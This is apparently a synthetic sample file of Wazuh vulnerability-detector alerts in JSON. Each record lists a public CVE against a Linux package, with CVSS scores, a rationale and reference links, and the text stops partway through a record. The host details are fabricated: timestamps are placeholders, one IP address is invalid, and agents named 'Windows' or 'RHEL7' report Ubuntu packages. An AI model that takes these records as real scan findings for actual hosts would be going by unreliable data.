+{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2018-6485 affects libc-bin","id":"23506","firedtimes":78,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc-bin","source":"glibc","version":"2.23-0ubuntu11","architecture":"amd64","condition":"Package less or equal than 2.26"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2018-6485","title":"CVE-2018-6485 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"An integer overflow in the implementation of the posix_memalign in memalign functions in the GNU C Library (aka glibc or libc6) 2.26 and earlier could cause these functions to return a pointer to a heap area that is too small, potentially leading to heap corruption.","severity":"Critical","published":"2018-02-01","updated":"2019-12-10","state":"Fixed","cwe_reference":"CWE-190","bugzilla_references":["http://bugs.debian.org/878159","https://sourceware.org/bugzilla/show_bug.cgi?id=22343"],"references":["http://bugs.debian.org/878159","http://www.securityfocus.com/bid/102912","https://access.redhat.com/errata/RHBA-2019:0327","https://access.redhat.com/errata/RHSA-2018:3092","https://security.netapp.com/advisory/ntap-20190404-0003/","https://sourceware.org/bugzilla/show_bug.cgi?id=22343","https://usn.ubuntu.com/4218-1/","https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html","https://nvd.nist.gov/vuln/detail/CVE-2018-6485","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-6485.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6485","https://usn.ubuntu.com/usn/usn-4218-1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-20217 affects libkrb5-3","id":"23504","firedtimes":254,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libkrb5-3","source":"krb5","version":"1.13.2+dfsg-5ubuntu2.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"single","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"3.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"high","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.300000"}},"cve":"CVE-2018-20217","title":"CVE-2018-20217 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request.","severity":"Medium","published":"2018-12-26","updated":"2019-10-03","state":"Unfixed","cwe_reference":"CWE-617","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=917387","http://krbdev.mit.edu/rt/Ticket/Display.html?id=8763"],"references":["http://krbdev.mit.edu/rt/Ticket/Display.html?id=8763","https://github.com/krb5/krb5/commit/5e6d1796106df8ba6bc1973ee0917c170d929086","https://lists.debian.org/debian-lts-announce/2019/01/msg00020.html","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2KNHELH4YHNT6H2ESJWX2UIDXLBNGB2O/","https://security.netapp.com/advisory/ntap-20190416-0006/","https://nvd.nist.gov/vuln/detail/CVE-2018-20217","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-20217.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20217"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-19232 affects sudo","id":"23504","firedtimes":398,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"sudo","version":"1.8.16-0ubuntu1.9","architecture":"amd64","condition":"Package less or equal than 1.8.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"}},"cve":"CVE-2019-19232","title":"CVE-2019-19232 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"** DISPUTED ** In Sudo through 1.8.29, an attacker with access to a Runas ALL sudoer account can impersonate a nonexistent user by invoking sudo with a numeric uid that is not associated with any user. NOTE: The software maintainer believes that this is not a vulnerability because running a command via sudo as a user not present in the local password database is an intentional feature. Because this behavior surprised some users, sudo 1.8.30 introduced an option to enable/disable this behavior with the default being disabled. However, this does not change the fact that sudo was behaving as intended, and as documented, in earlier versions.","severity":"Medium","published":"2019-12-19","updated":"2020-01-30","state":"Fixed","cwe_reference":"NVD-CWE-noinfo","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947225"],"references":["http://seclists.org/fulldisclosure/2020/Mar/31","https://access.redhat.com/security/cve/cve-2019-19232","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6TKF36KOQUVJNBHSVJFA7BU3CCEYD2F/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IY6DZ7WMDKU4ZDML6MJLDAPG42B5WVUC/","https://quickview.cloudapps.cisco.com/quickview/bug/CSCvs58103","https://quickview.cloudapps.cisco.com/quickview/bug/CSCvs58812","https://quickview.cloudapps.cisco.com/quickview/bug/CSCvs58979","https://quickview.cloudapps.cisco.com/quickview/bug/CSCvs76870","https://security.netapp.com/advisory/ntap-20200103-0004/","https://support.apple.com/en-gb/HT211100","https://support.apple.com/kb/HT211100","https://support2.windriver.com/index.php?page=cve&on=view&id=CVE-2019-19232","https://support2.windriver.com/index.php?page=defects&on=view&id=LIN1018-5506","https://www.bsi.bund.de/SharedDocs/Warnmeldungen/DE/CB/2019/12/warnmeldung_cb-k20-0001.html","https://www.oracle.com/security-alerts/bulletinapr2020.html","https://www.sudo.ws/devel.html#1.8.30b2","https://www.sudo.ws/stable.html","https://www.tenable.com/plugins/nessus/133936","https://nvd.nist.gov/vuln/detail/CVE-2019-19232","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-19232.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19232"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-1552 affects openssl","id":"23503","firedtimes":11,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssl","version":"1.1.1-1ubuntu2.1~18.04.6","architecture":"amd64","condition":"Package greater or equal than 1.1.1 and less or equal than 1.1.1c"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"3.300000"}},"cve":"CVE-2019-1552","title":"OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the mingw configuration targets assume that resulting programs and libraries are installed in a Unix-like environment and the default prefix for program installation as well as for OPENSSLDIR should be '/usr/local'. However, mingw programs are Windows programs, and as such, find themselves looking at sub-directories of 'C:/usr/local', which may be world writable, which enables untrusted users to modify OpenSSL's default configuration, insert CA certificates, modify (or even replace) existing engine modules, etc. For OpenSSL 1.0.2, '/usr/local/ssl' is used as default for OPENSSLDIR on all Unix and Windows targets, including Visual C builds. However, some build instructions for the diverse Windows targets on 1.0.2 encourage you to specify your own --prefix. OpenSSL versions 1.1.1, 1.1.0 and 1.0.2 are affected by this issue. Due to the limited scope of affected deployments this has been assessed as low severity and therefore we are not creating new releases at this time. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).","severity":"Low","published":"2019-07-30","updated":"2019-08-23","state":"Fixed","cwe_reference":"CWE-295","references":["https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=54aa9d51b09d67e90db443f682cface795f5af9e","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b15a19c148384e73338aa7c5b12652138e35ed28","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=d333ebaf9c77332754a9d5e111e2f53e1de54fdd","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e32bc855a81a2d48d215c506bdeb4f598045f7e9","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWC42UXL5GHTU5G77VKBF6JYUUNGSHOM/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y3IVFGSERAZLNJCK35TEM2R4726XIH3Z/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBEV5QGDRFUZDMNECFXUSN5FMYOZDE4V/","https://security.netapp.com/advisory/ntap-20190823-0006/","https://support.f5.com/csp/article/K94041354","https://support.f5.com/csp/article/K94041354?utm_source=f5support&utm_medium=RSS","https://www.openssl.org/news/secadv/20190730.txt","https://www.oracle.com/security-alerts/cpuapr2020.html","https://www.oracle.com/security-alerts/cpujan2020.html","https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html","https://www.tenable.com/security/tns-2019-08","https://www.tenable.com/security/tns-2019-09","https://nvd.nist.gov/vuln/detail/CVE-2019-1552"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2016-7948 affects libxrandr2","id":"23506","firedtimes":84,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libxrandr2","source":"libxrandr","version":"2:1.5.0-1","architecture":"amd64","condition":"Package less or equal than 1.5.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2016-7948","title":"CVE-2016-7948 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"X.org libXrandr before 1.5.1 allows remote X servers to trigger out-of-bounds write operations by leveraging mishandling of reply data.","severity":"Critical","published":"2016-12-13","updated":"2017-07-01","state":"Fixed","cwe_reference":"CWE-787","references":["http://www.openwall.com/lists/oss-security/2016/10/04/2","http://www.openwall.com/lists/oss-security/2016/10/04/4","http://www.securityfocus.com/bid/93373","http://www.securitytracker.com/id/1036945","https://cgit.freedesktop.org/xorg/lib/libXrandr/commit/?id=a0df3e1c7728205e5c7650b2e6dce684139254a6","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/74FFOHWYIKQZTJLRJWDMJ4W3WYBELUUG/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7662OZWCSTLRPKS6R3E4Y4M26BSVAAM/","https://lists.x.org/archives/xorg-announce/2016-October/002720.html","https://security.gentoo.org/glsa/201704-03","https://nvd.nist.gov/vuln/detail/CVE-2016-7948","http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7948.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7948"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-18018 affects coreutils","id":"23504","firedtimes":1,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"coreutils","version":"8.28-1ubuntu1","architecture":"amd64","condition":"Package less or equal than 8.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"high","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"high","availability":"none"},"base_score":"4.700000"}},"cve":"CVE-2017-18018","title":"CVE-2017-18018 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.","severity":"Medium","published":"2018-01-04","updated":"2018-01-19","state":"Fixed","cwe_reference":"CWE-362","references":["http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html","https://nvd.nist.gov/vuln/detail/CVE-2017-18018","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-18018.html","http://www.openwall.com/lists/oss-security/2018/01/04/3","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18018","https://lists.gnu.org/archive/html/coreutils/2017-12/msg00072.html","https://lists.gnu.org/archive/html/coreutils/2017-12/msg00073.html"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-1752 affects multiarch-support","id":"23503","firedtimes":17,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"multiarch-support","source":"glibc","version":"2.27-3ubuntu1","architecture":"amd64","condition":"Package less than 2.32.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"}},"cve":"CVE-2020-1752","title":"CVE-2020-1752 on Ubuntu 18.04 LTS (bionic) - medium.","rationale":"A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.","severity":"Low","published":"2020-04-30","updated":"2020-05-18","state":"Fixed","cwe_reference":"CWE-416","references":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752","https://security.netapp.com/advisory/ntap-20200511-0005/","https://sourceware.org/bugzilla/show_bug.cgi?id=25414","https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c","https://nvd.nist.gov/vuln/detail/CVE-2020-1752","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1752.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752","https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=263e6175999bc7f5adb8b32fd12fcfae3f0bb05a;hp=37db4539dd8b5c098d9235249c5d2aedaa67d7d1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-19645 affects sqlite3","id":"23503","firedtimes":19,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"sqlite3","version":"3.22.0-1ubuntu0.3","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"2.100000"}},"cve":"CVE-2019-19645","title":"CVE-2019-19645 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements.","severity":"Low","published":"2019-12-09","updated":"2019-12-23","state":"Unfixed","cwe_reference":"CWE-674","references":["https://github.com/sqlite/sqlite/commit/38096961c7cd109110ac21d3ed7dad7e0cb0ae06","https://security.netapp.com/advisory/ntap-20191223-0001/","https://www.oracle.com/security-alerts/cpuapr2020.html","https://nvd.nist.gov/vuln/detail/CVE-2019-19645","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-19645.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19645"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-15919 affects openssh-server","id":"23504","firedtimes":198,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssh-server","source":"openssh","version":"1:7.6p1-4ubuntu0.3","architecture":"amd64","condition":"Package greater or equal than 5.9 and less or equal than 7.8"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"low","integrity_impact":"none","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2018-15919","title":"CVE-2018-15919 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"Remotely observable behaviour in auth-gss2.c in OpenSSH through 7.8 could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. NOTE: the discoverer states 'We understand that the OpenSSH developers do not want to treat such a username enumeration (or \"oracle\") as a vulnerability.'","severity":"Medium","published":"2018-08-28","updated":"2019-03-07","state":"Fixed","cwe_reference":"CWE-200","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=907503","https://bugzilla.novell.com/show_bug.cgi?id=CVE-2018-15919"],"references":["http://seclists.org/oss-sec/2018/q3/180","http://www.securityfocus.com/bid/105163","https://security.netapp.com/advisory/ntap-20181221-0001/","https://nvd.nist.gov/vuln/detail/CVE-2018-15919","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15919.html","http://www.openwall.com/lists/oss-security/2018/08/27/2","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15919"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2020-1747 affects python3-yaml","id":"23505","firedtimes":44,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.12-1build2","architecture":"amd64","condition":"Package less than 5.3.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"10"}},"cve":"CVE-2020-1747","title":"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","severity":"High","published":"2020-03-24","updated":"2020-05-11","state":"Fixed","cwe_reference":"CWE-20","references":["http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747","https://github.com/yaml/pyyaml/pull/386","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/","https://nvd.nist.gov/vuln/detail/CVE-2020-1747"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-19645 affects libsqlite3-0","id":"23503","firedtimes":18,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libsqlite3-0","source":"sqlite3","version":"3.22.0-1ubuntu0.3","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"2.100000"}},"cve":"CVE-2019-19645","title":"CVE-2019-19645 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements.","severity":"Low","published":"2019-12-09","updated":"2019-12-23","state":"Unfixed","cwe_reference":"CWE-674","references":["https://github.com/sqlite/sqlite/commit/38096961c7cd109110ac21d3ed7dad7e0cb0ae06","https://security.netapp.com/advisory/ntap-20191223-0001/","https://www.oracle.com/security-alerts/cpuapr2020.html","https://nvd.nist.gov/vuln/detail/CVE-2019-19645","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-19645.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19645"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-1752 affects multiarch-support","id":"23503","firedtimes":17,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"multiarch-support","source":"glibc","version":"2.27-3ubuntu1","architecture":"amd64","condition":"Package less than 2.32.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"}},"cve":"CVE-2020-1752","title":"CVE-2020-1752 on Ubuntu 18.04 LTS (bionic) - medium.","rationale":"A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 